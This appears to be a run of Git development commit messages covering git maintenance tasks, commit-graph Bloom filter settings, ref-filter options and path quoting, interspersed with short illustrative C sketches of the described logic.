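	if (fd < 0)
		return -1;
	close(fd);	/* the file is only a placeholder; nothing is written */
	return 0;
}

/* Release the lock by removing the placeholder file. */
int release_lock(const char *path)
{
	return unlink(path);
}
```

A caller that gets -1 from take_lock() would skip all maintenance
tasks, which is what breaks a potential fetch/maintenance loop.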
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A user may want to only run certain maintenance tasks in a certain
order. Add the --task=<task> option, which allows a user to specify an
ordered list of tasks to run. These cannot be run multiple times,
however.
Here is where our array of maintenance_task pointers becomes critical.
We can sort the array of pointers based on the task order, but we do not
want to move the struct data itself in order to preserve the hashmap
references. We use the hashmap to match the --task=<task> arguments into
the task struct data.
Keep in mind that the 'enabled' member of the maintenance_task struct is
a placeholder for a future 'maintenance.<task>.enabled' config option.
Thus, we use the 'enabled' member to specify which tasks are run when
the user does not specify any --task=<task> arguments. The 'enabled'
member should be ignored if --task=<task> appears.
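To illustrate why sorting pointers rather than structs matters, here
is a small sketch. All names are hypothetical, and a linear scan stands
in for the hashmap lookup described above.

```c
#include <limits.h>
#include <stdlib.h>
#include <string.h>

struct toy_task {
	const char *name;
	int enabled;
	int selected;
	int selected_order;	/* INT_MAX while not selected */
};

/* Compare two 'struct toy_task *' elements by their selection order. */
static int compare_by_selection(const void *a, const void *b)
{
	const struct toy_task *x = *(const struct toy_task *const *)a;
	const struct toy_task *y = *(const struct toy_task *const *)b;

	return (x->selected_order > y->selected_order) -
	       (x->selected_order < y->selected_order);
}

/*
 * Record one --task=<name> argument. Returns -1 for an unknown name
 * or for a task that was already listed.
 */
int select_task(struct toy_task *tasks, size_t nr, const char *name,
		int *next_order)
{
	size_t i;

	for (i = 0; i < nr; i++) {
		if (strcmp(tasks[i].name, name))
			continue;
		if (tasks[i].selected)
			return -1;
		tasks[i].selected = 1;
		tasks[i].selected_order = (*next_order)++;
		return 0;
	}
	return -1;
}

/* Sort only the pointers; the structs themselves never move. */
void order_tasks(struct toy_task **ptrs, size_t nr)
{
	qsort(ptrs, nr, sizeof(*ptrs), compare_by_selection);
}
```

Because only the pointer array is reordered, any other reference to a
task struct (such as a hashmap entry) stays valid after the sort.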
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The first new task in the 'git maintenance' builtin is the
'commit-graph' task. This updates the commit-graph file
incrementally with the command
git commit-graph write --reachable --split
By writing an incremental commit-graph file using the "--split"
option we minimize the disruption from this operation. The default
behavior is to merge layers until the new "top" layer is less than
half the size of the layer below. This provides quick writes most
of the time, with the longer writes following a power law
distribution.
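The merge rule can be sketched on a plain array of layer sizes. This
is a simplified model, not the commit-graph code; 'add_layer' is a
hypothetical name and the factor of two is taken from the "half the
size" wording above.

```c
#include <stddef.h>

/*
 * 'layers' holds the commit count of each layer, base layer first, and
 * 'nr' is the number of existing layers. 'new_commits' is the size of
 * the layer about to be written. The new layer absorbs the layer below
 * it for as long as it is at least half that layer's size.
 *
 * Updates 'layers' in place and returns the new number of layers.
 * 'layers' must have room for nr + 1 entries.
 */
size_t add_layer(size_t *layers, size_t nr, size_t new_commits)
{
	size_t top = new_commits;

	while (nr > 0 && 2 * top >= layers[nr - 1]) {
		top += layers[nr - 1];
		nr--;
	}
	layers[nr] = top;
	return nr + 1;
}
```

Starting from layers of 1000 and 100 commits, adding 10 commits just
appends a third layer, adding 60 merges into the second layer, and
adding 500 collapses everything into one layer. Small writes are the
common case, and the expensive full merges are rare.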
Most importantly, concurrent Git processes only look at the
commit-graph-chain file for a very short amount of time, so they
will very likely not be holding a handle to the file when we try
to replace it. (This only matters on Windows.)
If a concurrent process reads the old commit-graph-chain file, but
our job expires some of the .graph files before they can be read,
then those processes will see a warning message (but not fail).
This could be avoided by a future update to use the --expire-time
argument when writing the commit-graph.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In anticipation of implementing multiple maintenance tasks inside the
'maintenance' builtin, use a list of structs to describe the work to be
done.
The struct maintenance_task stores the name of the task (as given by a
future command-line argument) along with a function pointer to its
implementation and a boolean for whether the step is enabled.
A list of these structs is initialized with the full list of implemented
tasks along with a default order. For now, this list only contains the
"gc" task. This task is also the only task enabled by default.
The run subcommand will return a nonzero exit code if any task fails.
However, it will attempt all tasks in its loop before returning with the
failure. Also each failed task will print an error message.
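The "attempt everything, then report failure" loop might look roughly
like this. It is a sketch with hypothetical names ('struct toy_task',
'run_tasks', and the two stub tasks); the 'attempted' out-parameter
exists only to make the behavior observable.

```c
#include <stdio.h>

struct toy_task {
	const char *name;
	int (*fn)(void);	/* returns 0 on success, nonzero on failure */
	int enabled;
};

/* Hypothetical task bodies used for illustration. */
static int toy_gc(void) { return 0; }
static int toy_broken(void) { return 1; }

/*
 * Run every enabled task, even after an earlier one has failed.
 * Prints an error for each failure and returns nonzero if any task
 * failed. '*attempted' receives the number of tasks that were run.
 */
int run_tasks(const struct toy_task *tasks, size_t nr, int *attempted)
{
	int result = 0;
	size_t i;

	*attempted = 0;
	for (i = 0; i < nr; i++) {
		if (!tasks[i].enabled)
			continue;
		(*attempted)++;
		if (tasks[i].fn()) {
			fprintf(stderr, "error: task '%s' failed\n",
				tasks[i].name);
			result = 1;
		}
	}
	return result;
}
```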
Helped-by: Taylor Blau <me@ttaylorr.com>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The run_auto_gc() method is used in several places to trigger a check
for repo maintenance after some Git commands, such as 'git commit' or
'git fetch'.
To allow for extra customization of this maintenance activity, replace
the 'git gc --auto [--quiet]' call with one to 'git maintenance run
--auto [--quiet]'. As we extend the maintenance builtin with other
steps, users will be able to select different maintenance activities.
Rename run_auto_gc() to run_auto_maintenance() to be clearer what is
happening on this call, and to expose all callers in the current diff.
Rewrite the method to use a struct child_process to simplify the calls
slightly.
Since 'git fetch' already allows disabling the 'git gc --auto'
subprocess, add an equivalent option with a different name to be more
descriptive of the new behavior: '--[no-]maintenance'. Update the
documentation to include these options at the same time.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Maintenance activities are commonly used as steps in larger scripts.
Providing a '--quiet' option allows those scripts to be less noisy when
run on a terminal window. Turn this mode on by default when stderr is
not a terminal.
Pipe the option to the 'git gc' child process.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'gc' builtin is our current entrypoint for automatically maintaining
a repository. This one tool does many operations, such as repacking the
repository, packing refs, and rewriting the commit-graph file. The name
implies it performs "garbage collection" which means several different
things, and some users may not want to use this operation that rewrites
the entire object database.
Create a new 'maintenance' builtin that will become a more general-
purpose command. To start, it will only support the 'run' subcommand,
but will later expand to add subcommands for scheduling maintenance in
the background.
For now, the 'maintenance' builtin is a thin shim over the 'gc' builtin.
In fact, the only option is the '--auto' toggle, which is handed
directly to the 'gc' builtin. The current change is isolated to this
simple operation to prevent more interesting logic from being lost in
all of the boilerplate of adding a new builtin.
Use the existing builtin/gc.c file because we want to share code between the
two builtins. It is possible that we will have 'maintenance' replace the
'gc' builtin entirely at some point, leaving 'git gc' as an alias for
some specific arguments to 'git maintenance run'.
Create a new test_subcommand helper that allows us to test if a certain
subcommand was run. It requires storing the GIT_TRACE2_EVENT logs in a
file. A negation mode is available that will be used in later tests.
Helped-by: Jonathan Nieder <jrnieder@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
difftool parses its own options and then passes the remaining options
onto diff. As a result, they share common command-line options. Instead
of duplicating the list, use a shared $__git_diff_difftool_options list.
The completion for diff is missing --relative and the completion for
difftool is missing --no-index. Add both of these to the common list.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The modern way to quote commands in the documentation is to use
backticks instead of double-quotes as this renders the text with the
code style. Convert double-quoted command text to backtick-quoted
commands. While we're at it, quote one instance of `^@`.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The many `git diff` invocations have a `>tmp` redirection even though
the file is not being used afterwards. Remove these unnecessary
redirections.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit e3696980 (diff: halt tree-diff early after max_changes,
2020-03-30) intended to create a mechanism to short-circuit a diff
calculation after a certain number of paths were modified. By
incrementing a "num_changes" counter throughout the recursive
ll_diff_tree_paths(), this was supposed to match the number of changes
that would be written into the changed-path Bloom filters.
Unfortunately, this was not implemented correctly and instead misses
simple cases like file modifications. This then does not stop very
large changed-path filters from being written (unless they add or remove
many files).
To start, change the implementation in ll_diff_tree_paths() to instead
use the global diff_queue_diff struct's 'nr' member as the count. This
is a way to simplify the logic instead of making more mistakes in the
complicated diff code.
This has a drawback: the diff_queue_diff struct only lists the paths
corresponding to blob changes, not their leading directories. Thus,
get_or_compute_bloom_filter() needs an additional check to see if the
hashmap with the leading directories becomes too large.
One reason why this was not caught by test cases was that the test in
t4216-log-bloom.sh that was supposed to check this "too many changes"
condition only checked this on the initial commit of a repository. The
old logic counted these values correctly. Update this test in a few
ways:
1. Use GIT_TEST_BLOOM_SETTINGS_MAX_CHANGED_PATHS to reduce the limit,
allowing smaller commits to engage with this logic.
2. Create several interesting cases of edits, adds, removes, and mode
changes (in the second commit). By testing both sides of the
inequality with the *_MAX_CHANGED_PATHS variable, we can see that
the count is exactly correct, so none of these changes are missed
or over-counted.
3. Use the trace2 data value filter_found_large to verify that these
commits are on the correct side of the limit.
Another way to verify the behavior is correct is through performance
tests. By testing on my local copies of the Git repository and the Linux
kernel repository, I could measure the effect of these short-circuits
when computing a fresh commit-graph file with changed-path Bloom filters
using the command
GIT_TEST_BLOOM_SETTINGS_MAX_CHANGED_PATHS=N time \
git commit-graph write --reachable --changed-paths
and reporting the wall time and resulting commit-graph size.
For Git, the results are
| | N=1 | N=10 | N=512 |
|--------|----------------|----------------|----------------|
| HEAD~1 | 10.90s 9.18MB | 11.11s 9.34MB | 11.31s 9.35MB |
| HEAD | 9.21s 8.62MB | 11.11s 9.29MB | 11.29s 9.34MB |
For Linux, the results are
| | N=1 | N=20 | N=512 |
|--------|----------------|---------------|---------------|
| HEAD~1 | 61.28s 64.3MB | 76.9s 72.6MB | 77.6s 72.6MB |
| HEAD | 49.44s 56.3MB | 68.7s 65.9MB | 69.2s 65.9MB |
Naturally, the improvement becomes much less as the limit grows, as
fewer commits satisfy the short-circuit.
Reported-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When 'get_or_compute_bloom_filter()' needs to compute a Bloom filter
from scratch, it looks to the default 'struct bloom_filter_settings' in
order to determine the maximum number of changed paths, number of bits
per entry, and so on.
All of these values have so far been constant, and so there was no need
to pass in a pointer from the caller (e.g., the one that is stored in the
'struct write_commit_graph_context').
Start passing in a 'struct bloom_filter_settings *' instead of using the
default values to respect graph-specific settings (e.g., in the case of
setting 'GIT_TEST_BLOOM_SETTINGS_MAX_CHANGED_PATHS').
In order to have an initialized value for these settings, move its
initialization to earlier in the commit-graph write.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'get_bloom_filter' takes a flag to control whether it will compute a
Bloom filter if the requested one is missing. In the next patch, we'll
add yet another parameter to this method, which would force all but one
caller to specify an extra 'NULL' parameter at the end.
Instead of doing this, split 'get_bloom_filter' into two functions:
'get_bloom_filter' and 'get_or_compute_bloom_filter'. The former only
looks up a Bloom filter (and does not compute one if it's missing,
thus dropping the 'compute_if_not_present' flag). The latter does
compute missing Bloom filters, with an additional parameter to store
whether or not it needed to do so.
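The shape of the split can be sketched as follows. The types are toy
stand-ins and the "computation" is a placeholder; only the two-function
structure and the out-parameter reflect the description above.

```c
#include <stddef.h>

/* Hypothetical stand-ins for the real filter and commit types. */
struct toy_filter {
	size_t nr_paths;
};

struct toy_commit {
	size_t nr_changed_paths;
	int has_filter;
	struct toy_filter filter;
};

/* Lookup only: never computes a missing filter. */
struct toy_filter *get_bloom_filter(struct toy_commit *c)
{
	return c->has_filter ? &c->filter : NULL;
}

/*
 * Lookup, and compute on a miss when 'compute_if_not_present' is set.
 * If 'computed' is non-NULL, it reports whether a computation happened.
 */
struct toy_filter *get_or_compute_bloom_filter(struct toy_commit *c,
					       int compute_if_not_present,
					       int *computed)
{
	struct toy_filter *f = get_bloom_filter(c);

	if (computed)
		*computed = 0;
	if (f || !compute_if_not_present)
		return f;

	/* Placeholder for the real work of hashing the changed paths. */
	c->filter.nr_paths = c->nr_changed_paths;
	c->has_filter = 1;
	if (computed)
		*computed = 1;
	return &c->filter;
}
```

Callers that only read filters use the one-argument function, and only
the writer needs the longer signature.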
This simplifies many call-sites, since the majority of existing callers
to 'get_bloom_filter' do not want missing Bloom filters to be computed
(so they can drop the parameter entirely and use the simpler version of
the function).
While we're at it, instrument the new 'get_or_compute_bloom_filter()'
with counters in the 'write_commit_graph_context' struct which store
the number of filters that we did and didn't compute, as well as filters
that were truncated.
It would be nice to drop the 'compute_if_not_present' flag entirely,
since all remaining callers of 'get_or_compute_bloom_filter' pass it as
'1', but this will change in a future patch and hence cannot be removed.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
For now, we assume that there is a fixed constant describing the
maximum number of changed paths we are willing to store in a Bloom
filter.
Prepare for that to (at least partially) not be the case by making it a
member of the 'struct bloom_filter_settings'. This will be helpful in
the subsequent patches by reducing the size of test cases that exercise
storing too many changed paths, as well as preparing for an eventual
future in which this value might change.
This patch alone does not cause newly generated Bloom filters to use
a custom upper-bound on the maximum number of changed paths a single
Bloom filter can hold; that will occur in a later patch.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Make the mergetool used with "meld" backend behave similarly to "vimdiff" by
telling it to auto-merge non-conflicting parts and highlight the conflicting
parts when `mergetool.meld.useAutoMerge` is configured with `true`, or `auto`
for detecting the `--auto-merge` option automatically.
Helped-by: Đoàn Trần Công Danh <congdanhqx@gmail.com>
Helped-by: David Aguilar <davvid@gmail.com>
Signed-off-by: Lin Sun <lin.sun@zoom.us>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Amend a comment in the test.config file to point to the latest
upstream version, which makes it easier for the user to tweak this.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the link to the canonical one; the old link redirects to the
new one.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Enable ref-filter to process multiple merged and no-merged filters, and
extend functionality to git branch, git tag and git for-each-ref. This
provides an easy way to check for branches that are "graduation
candidates:"
$ git branch --no-merged master --merged next
If passed more than one merged (or more than one no-merged) filter, refs
must be reachable from any one of the merged commits, and reachable from
none of the no-merged commits.
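The combination rule can be written down as a small predicate. This is
a sketch that assumes reachability has already been computed elsewhere;
'ref_passes_filters' and its array arguments are hypothetical and do
not mirror ref-filter's data structures.

```c
#include <stddef.h>

/*
 * 'from_merged[i]' is nonzero if the ref is reachable from the i-th
 * --merged commit; 'from_no_merged[j]' is the same for the j-th
 * --no-merged commit. Returns 1 if the ref should be listed.
 */
int ref_passes_filters(const int *from_merged, size_t nr_merged,
		       const int *from_no_merged, size_t nr_no_merged)
{
	size_t i;
	int any_merged = (nr_merged == 0);	/* no --merged: nothing required */

	for (i = 0; i < nr_merged; i++)
		if (from_merged[i])
			any_merged = 1;
	if (!any_merged)
		return 0;

	for (i = 0; i < nr_no_merged; i++)
		if (from_no_merged[i])
			return 0;
	return 1;
}
```

For the "graduation candidates" example, a branch passes when it is
reachable from next (the one --merged commit) and not reachable from
master (the one --no-merged commit).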
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Update documentation for "git branch", "git for-each-ref" and "git tag"
with notes explaining what happens when passed multiple --contains or
--no-contains filters.
This behavior is useful to document prior to enabling multiple
merged/no-merged filters, in order to demonstrate consistent behavior
between merged/no-merged and contains/no-contains filters.
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add tests covering the behavior of passing multiple contains/no-contains
filters to git branch, e.g.:
$ git branch --contains feature_a --contains feature_b
$ git branch --no-contains feature_a --no-contains feature_b
When passed more than one contains (or no-contains) filter, the tips of
the branches returned must be reachable from any of the contains commits
and from none of the no-contains commits.
This logic is useful to describe prior to enabling multiple
merged/no-merged filters, so that future tests will demonstrate
consistent behavior between merged/no-merged and contains/no-contains
filters.
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The correct value from commit-graph.c:
#define GRAPH_PARENT_NONE 0x70000000
Signed-off-by: Conor Davis <git@conor.fastmail.fm>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The options indicate user intent for the whole fetch operation, and
ignoring them in sub-fetches (i.e. "--all" and recursive fetching of
submodules) is quite unexpected when, for instance, it is intended
to limit all of the communication to a specific transport protocol
for some reason.
Signed-off-by: Alex Riesen <alexander.riesen@cetitec.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
quote_c_style() and its friend quote_two_c_style() both take an
optional "please omit the double quotes around the quoted body"
parameter. Turn it into a flag word, assign one bit out of it,
and call it CQUOTE_NODQ bit.
No behaviour change intended.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This table is used to see if each byte needs quoting when responding
to a request to C-quote the string, not quoting with single-quote in
the shell style. Similarly, sq_must_quote() is fed each byte from
the string being C-quoted.
No behaviour change intended.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Tracked paths with SP in them were cquoted in "git status --short"
output, but untracked, ignored, and unmerged paths weren't.
The test was stolen from a patch to fix output for the 'untracked'
paths by brian m. carlson, with similar tests added for 'ignored'
ones.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The implementation we moved from wt-status to enclose a pathname
that has a SP in it inside a dq-pair is a bit convoluted. It lets
quote_c_style_counted() do its escaping and then
(1) if the input string got escaped, which is checked by seeing if
the result begins with a double-quote, declare that we are
done. If there wasn't any SP in the input, that is OK, and if
there was, the result is quoted already so it is OK, too.
(2) if the input string did not get escaped, and the result has SP
in it, enclose the whole thing in a dq-pair ourselves.
Instead we can scan the path upfront to see if the input has SP in
it. If so, we tell quote_c_style_counted() not to enclose its
output in a dq-pair, and we add a dq-pair ourselves. Whether or not
the input had bytes for which quote_c_style_counted() uses backslash
quoting, this gives us the desired quoted string. If the input does not
have SP in it, we just let quote_c_style_counted() do its thing as
usual, which would enclose the result in a dq-pair only when needed.
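A toy model of the upfront-scan approach, for illustration only.
'toy_quote' is a much-simplified stand-in for quote_c_style_counted()
(it escapes only '"', '\' and control bytes, always in octal), and
TOY_CQUOTE_NODQ and 'toy_quote_path_sp' are hypothetical names.

```c
#include <stdio.h>
#include <string.h>

#define TOY_CQUOTE_NODQ 01	/* omit the enclosing dq-pair */

/* Does byte 'c' need backslash quoting in this toy model? */
static int needs_escape(unsigned char c)
{
	return c == '"' || c == '\\' || c < 0x20 || c == 0x7f;
}

/*
 * Write the possibly quoted form of 'in' to 'out'. A dq-pair is added
 * only when some byte was escaped and TOY_CQUOTE_NODQ is not set.
 * 'out' must have room for 4 * strlen(in) + 3 bytes.
 * Returns nonzero if any byte was escaped.
 */
static int toy_quote(const char *in, char *out, unsigned flags)
{
	const unsigned char *p;
	int escaped = 0;
	int dq;

	for (p = (const unsigned char *)in; *p; p++)
		escaped |= needs_escape(*p);
	dq = escaped && !(flags & TOY_CQUOTE_NODQ);

	if (dq)
		*out++ = '"';
	for (p = (const unsigned char *)in; *p; p++) {
		if (*p == '"' || *p == '\\') {
			*out++ = '\\';
			*out++ = (char)*p;
		} else if (needs_escape(*p)) {
			out += sprintf(out, "\\%03o", (unsigned)*p);
		} else {
			*out++ = (char)*p;
		}
	}
	if (dq)
		*out++ = '"';
	*out = '\0';
	return escaped;
}

/*
 * Quote 'in', forcing a dq-pair whenever it contains a SP.
 * 'out' has the same size requirement as for toy_quote().
 */
void toy_quote_path_sp(const char *in, char *out)
{
	if (strchr(in, ' ')) {
		/* Scan found a SP: add the dq-pair ourselves. */
		*out++ = '"';
		toy_quote(in, out, TOY_CQUOTE_NODQ);
		strcat(out, "\"");
	} else {
		/* No SP: the quoting routine decides on its own. */
		toy_quote(in, out, 0);
	}
}
```

The single scan for SP replaces the after-the-fact check of whether the
result already begins with a double-quote.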
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Some code in wt-status.c special-cases a path with SP in it, which
usually does not have to be c-quoted, and ensures that such a path
does get quoted. Move the logic to quote_path() and give it a bit
in the flags word, QUOTE_PATH_QUOTE_SP.
No behaviour change intended.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The quote_path() function computes a path (relative to its base
directory) and c-quotes the result if necessary. Teach it to take a
flags parameter to allow its behaviour to be enriched later.
No behaviour change intended.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There is no quote_path_absolute() or anything that causes confusion,
and one of the two large consumers already renames the long name
locally with a preprocessor macro.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
tr(1) in the ANSI/POSIX environment, aka APE, doesn't support the \n literal.
It handles only octal (\ooo) or hexadecimal (\xhhhh) numbers.
Also, its sed(1) limits labels to a maximum of seven characters.
Therefore I shortened some labels by dropping characters.
* close -> cl
* continue -> cont (cnt is used for count)
* line -> ln
* hered -> hdoc
* shell -> sh
* string -> str
Signed-off-by: Kyohei Kadota <lufia@lufia.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Fix build procedure for MSVC.
* os/vcbuild:
contrib/buildsystems: fix expat library name for generated vcxproj
vcbuild: fix batch file name in README
vcbuild: fix library name for expat with make MSVC=1
"git status" has trouble showing where it came from by interpreting
reflog entries that record certain events, e.g. "checkout @{u}", and
gives a hard/fatal error. Even though it inherently is impossible
to give a correct answer because the reflog entries lose some
information (e.g. "@{u}" does not record what branch the user was
on hence which branch 'the upstream' needs to be computed, and even
if the record were available, the relationship between branches may
have changed), at least hide the error to allow "status" to show its
output.
* jt/interpret-branch-name-fallback:
wt-status: tolerate dangling marks
refs: move dwim_ref() to header file
sha1-name: replace unsigned int with option struct
The "--format=" option to the "for-each-ref" command and friends
learned a few more tricks, e.g. the ":short" suffix that applies to
"objectname" now also can be used for "parent", "tree", etc.
* hv/ref-filter-misc:
ref-filter: add `sanitize` option for 'subject' atom
pretty: refactor `format_sanitized_subject()`
ref-filter: add `short` modifier to 'parent' atom
ref-filter: add `short` modifier to 'tree' atom
ref-filter: rename `objectname` related functions and fields
ref-filter: modify error messages in `grab_objectname()`
ref-filter: refactor `grab_objectname()`
ref-filter: support different email formats
Fixups to a topic in 'next'.
* ss/submodule-summary-in-c-fixes:
t7421: eliminate 'grep' check in t7421.4 for mingw compatibility
submodule: fix style in function definition
submodule: eliminate unused parameters from print_submodule_summary()
Internal API clean-up to handle more sensibly two options that
"diff-index" and "log" have, which happen to share the same short form.
* so/separate-field-for-m-and-diff-merges:
revision: add separate field for "-m" of "diff-index -m"
"git worktree" gained a "repair" subcommand to help users recover
after moving the worktrees or repository manually without telling
Git. Also, "git init --separate-git-dir" no longer corrupts
administrative data related to linked worktrees.
* es/worktree-repair:
init: make --separate-git-dir work from within linked worktree
init: teach --separate-git-dir to repair linked worktrees
worktree: teach "repair" to fix outgoing links to worktrees
worktree: teach "repair" to fix worktree back-links to main worktree
worktree: add skeleton "repair" command
When a packfile is removed by "git repack", multi-pack-index gets
cleared; the code was taught to do so less aggressively by first
checking if the midx actually refers to a pack that no longer
exists.
* tb/repack-clearing-midx:
midx: traverse the local MIDX first
builtin/repack.c: invalidate MIDX only when necessary
Yet another subcommand of "git submodule" is getting rewritten in C.
* ss/submodule-summary-in-c:
submodule: port submodule subcommand 'summary' from shell to C
t7421: introduce a test script for verifying 'summary' output
submodule: rename helper functions to avoid ambiguity
submodule: remove extra line feeds between callback struct and macro
When set in the environment, GIT_TRACE_REFS makes git print operations and
results as they flow through the ref storage backend. This helps debug
discrepancies between different ref backends.
Example:
$ GIT_TRACE_REFS="1" ./git branch
15:42:09.769631 refs/debug.c:26 ref_store for .git
15:42:09.769681 refs/debug.c:249 read_raw_ref: HEAD: 0000000000000000000000000000000000000000 (=> refs/heads/ref-debug) type 1: 0
15:42:09.769695 refs/debug.c:249 read_raw_ref: refs/heads/ref-debug: 3a238e539b (=> refs/heads/ref-debug) type 0: 0
15:42:09.770282 refs/debug.c:233 ref_iterator_begin: refs/heads/ (0x1)
15:42:09.770290 refs/debug.c:189 iterator_advance: refs/heads/b4 (0)
15:42:09.770295 refs/debug.c:189 iterator_advance: refs/heads/branch3 (0)
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Git uses the 'core.commitGraph' configuration value to control whether
or not the commit graph is used when parsing commits or performing a
traversal.
Now that commit-graphs can also contain a section for changed-path Bloom
filters, administrators that already have commit-graphs may find it
convenient to use those graphs without relying on their changed-path
Bloom filters. This can happen, for example, during a staged roll-out,
or in the event of an incident.
Introduce 'commitGraph.readChangedPaths' to control whether or not Bloom
filters are read. Note that this configuration is independent from both:
- 'core.commitGraph', to allow flexibility in using all parts of a
commit-graph _except_ for its Bloom filters.
- The '--changed-paths' option for 'git commit-graph write', to allow
reading and writing Bloom filters to be controlled independently.
When the variable is set, pretend as if no Bloom data was specified at
all. This avoids adding additional special-casing outside of the
commit-graph internals.
Suggested-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The read-graph test-tool is used by a number of the commit-graph tests to
assert various properties about a commit-graph. Previously, this program
never ran 'prepare_repo_settings()'. There was no need to do so, since
none of the commit-graph machinery is affected by the repo settings.
In the next patch, the commit-graph machinery's behavior will become
dependent on the repo settings, and so loading them before running the
rest of the test tool is critical.
As such, teach the test tool to call 'prepare_repo_settings()'.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a future commit, some commit-graph internals will want access to
'r->settings', but we only have the 'struct object_directory *'
corresponding to that repository.
Add an additional parameter to pass the repository around in more
places.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a759bfa9ee (t4216: add end to end tests for git log with Bloom
filters, 2020-04-06), a 'rm' invocation was added without a
corresponding '&&' chain.
When 'trace.perf' already exists, everything works fine. However, the
function can be executed without 'trace.perf' on disk (e.g., when the
subset of tests run is altered with '--run'), and so the bare 'rm'
complains about a missing file.
To remove some noise from the test log, invoke 'rm' with '-f', at which
point it is sensible to place the 'rm -f' in an '&&'-chain, which is
both (1) our usual style, and (2) avoids a broken chain in the future if
more commands are added at the beginning of the function.
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Helped-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Many places in the code often need a pointer to the commit-graph's
'struct bloom_filter_settings', in which case they often take the value
from the top-most commit-graph.
In the non-split case, this works as expected. In the split case,
however, things get a little tricky. Not all layers in a chain of
incremental commit-graphs are required to themselves have Bloom data,
and so whether or not some part of the code uses Bloom filters depends
entirely on whether or not the top-most level of the commit-graph chain
has Bloom filters.
This has been the behavior since Bloom filters were introduced, and has
been codified into the tests since a759bfa9ee (t4216: add end to end
tests for git log with Bloom filters, 2020-04-06). In fact, t4216.130
requires that Bloom filters are not used in exactly the case described
earlier.
There is no reason that this needs to be the case, since it is perfectly
valid for commits in an earlier layer to have Bloom filters when commits
in a newer layer do not.
Since Bloom settings are guaranteed in practice to be the same for any
layer in a chain that has Bloom data, it is sufficient to traverse the
'->base_graph' pointer until either (1) a non-null 'struct
bloom_filter_settings *' is found, or (2) until we are at the root of
the commit-graph chain.
Introduce a 'get_bloom_filter_settings()' function that does just this,
and use it instead of purely dereferencing the top-most graph's
'->bloom_filter_settings' pointer.
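The traversal itself is short. A sketch with toy structs follows: the
two field names are the ones mentioned above, while the 'toy_' types
and the function name are hypothetical.

```c
#include <stddef.h>

struct toy_bloom_settings {
	unsigned num_hashes;
	unsigned bits_per_entry;
};

struct toy_commit_graph {
	/* NULL when this layer carries no Bloom data. */
	struct toy_bloom_settings *bloom_filter_settings;
	/* Next older layer in the chain; NULL at the root. */
	struct toy_commit_graph *base_graph;
};

/*
 * Walk from the top-most layer toward the root and return the first
 * non-NULL settings pointer, or NULL if no layer has Bloom data.
 */
struct toy_bloom_settings *
toy_get_bloom_filter_settings(struct toy_commit_graph *top)
{
	struct toy_commit_graph *g;

	for (g = top; g; g = g->base_graph)
		if (g->bloom_filter_settings)
			return g->bloom_filter_settings;
	return NULL;
}
```

A chain whose newest layer lacks Bloom data but whose base layer has it
now yields the base layer's settings instead of NULL.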
While we're at it, add an additional test in t5324 to guard against code
in the commit-graph writing machinery that doesn't correctly handle a
NULL 'struct bloom_filter *'.
Co-authored-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
